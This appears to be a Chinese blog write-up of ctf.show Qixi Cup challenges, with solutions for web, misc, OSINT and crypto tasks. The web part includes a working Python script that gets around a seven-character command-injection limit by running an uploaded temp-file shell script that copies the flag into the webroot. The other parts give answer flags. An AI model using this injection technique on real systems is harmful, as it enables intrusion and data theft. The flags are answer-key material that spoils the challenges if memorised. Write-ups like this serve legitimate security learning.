七夕杯wp

持续创作，加速成长！这是我参与「掘金日新计划 · 10 月更文挑战」的第3天，点击查看活动详情

web

web1

题目界面是这样的，输入ls,nl flag 等较短命令是可以执行的，但是没有回显。然后我们看一下js源码，

发现字符长度是不能超过七的。这个时候直接使用临时文件rce的脚本

__AUTHOR__ = "h1xa"

url = "http://a9320a52-4229-4dab-aa2b-9193c06c95e1.challenge.ctf.show/"


def getFlag():
  file={
  "file":"#!/bin/sh\ncat /f*>/var/www/html/1.txt"
  }

  data={
    "cmd":". /t*/*"
  }
  response = requests.post(url=url+"api/tools.php",files=file,data=data)
  if "t*" in response.text:
    print("执行成功，检查回显...")
  response = requests.get(url=url+"1.txt")
  if response.status_code == 200:
    print("flag 获取成功 "+response.text)
  else:
    print("flag 获取失败")

misc

签到：

一个jpg文件，用010打开翻到最后直接发现flag.

不一样的拼图：

一个打太极的视频，用剪映打开，开0.5倍速，一帧一帧的看，得到：ctff96846ca-dh}4seb19eo6{alf160d482bfxaa7eb0ooyv5c71-5eyw-f3lbc

osint

社工签到：

打开是一张海边的图片，直接百度识图

根据提示，是个什么小镇

看到这个眼前一亮，输入但是不对，改成天涯小镇，就对了。

迷失的大象

百度识图

一眼看到题中的图片

显而易见，这个地方就是普洱市墨江县，至于格式，我一开始想的是普洱市墨江县，结果不对。

地图上搜一下墨江县

得到flag

大飞机

跟前两个题一样的步骤，百度识图

这里搜了很多图都没搜到，原来就在这里

flag就是ctfshow{CA981}

crypto

密码签到

首先尝试了好几种密码，但是都不对。没想到是需要将后面的字符串转为二进制

1010000000000000010000000000100010100000

y3rmc2hvd3tjcnlwd g9fc2lnbmlu x2lzx2vhc3l9一一对应

1时将字母大写，2不做处理。得到

Y3Rmc2hvd3tjcnlwdG9fc2lnbmluX2lzX2Vhc3l9

base64解密得到flag:ctfshow{crypto_signin_is_easy}